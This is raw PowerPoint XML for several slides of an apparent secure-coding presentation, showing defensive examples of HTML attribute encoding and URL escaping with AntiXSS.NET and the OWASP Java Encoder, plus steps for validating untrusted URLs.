              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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0" name="TextBox 19"/>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HTML</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3989298"/>
            <a:ext cx="8229052" cy="1080869"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="1080869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Picture 23"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5" b="76565"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="731520"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4044511"/>
              <a:ext cx="7895852" cy="266740"/>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600" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>Encoder.HtmlAttributeEncode</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:srgbClr val="DB3D16"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AntiXSS.NET</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1943089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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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URL Substring Contexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10025150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URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Fragment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Escaping Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1643601"/>
            <a:ext cx="8666252" cy="2635349"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8666252" cy="2635349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13"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4" b="23439"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="2286000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="769852" y="4044511"/>
              <a:ext cx="8353600" cy="1683859"/>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b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;%-- Encode URL parameter values --%&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>href</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>="/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>search?value</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&amp;order=1#top"&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;%-- Encode REST URL parameters --%&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>href</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>="http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>www.manicode.com</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>/page/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"&gt; </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16"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URL/URI Escaping</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6970003" y="457200"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Oval 28"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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8" name="TextBox 27"/>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URL</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1819406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URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Fragment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Escaping Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1643601"/>
            <a:ext cx="8666252" cy="3256310"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8666252" cy="2635349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13"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4" b="23439"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3854128"/>
              <a:ext cx="8229052" cy="2286000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="769852" y="4044511"/>
              <a:ext cx="8353600" cy="258019"/>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endParaRPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16"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OWASP Java Encoder</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6970003" y="457200"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Oval 28"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>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8" name="TextBox 27"/>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URL</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="769852" y="2222255"/>
            <a:ext cx="7554013" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>String theUrl = "/search?value=" + Encode.forUriComponent(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>parameterValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>) + "&amp;order=1#top";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;a href="&lt;%= Encode.forHtmlAttribute(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>theUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>) %&gt;"&gt;LINK&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1442646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Protecting Untrusted Complete URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="TextBox 73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191686" y="3916197"/>
            <a:ext cx="2315600" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="228600" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>Check the URL for malware inbound and outbound</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="TextBox 74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1361784" y="3451248"/>
            <a:ext cx="654084" cy="657732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="TextBox 81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171181" y="1931658"/>
            <a:ext cx="2336105" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="228600" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>First validate to ensure the string is a valid URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="TextBox 82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4030010" y="1931658"/>
            <a:ext cx="2428170" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="228600" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>Only allow HTTP or HTTPS only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="TextBox 84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1341278" y="1466709"/>
            <a:ext cx="654084" cy="657732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="TextBox 85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200106" y="1466709"/>
            <a:ext cx="654084" cy="657732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
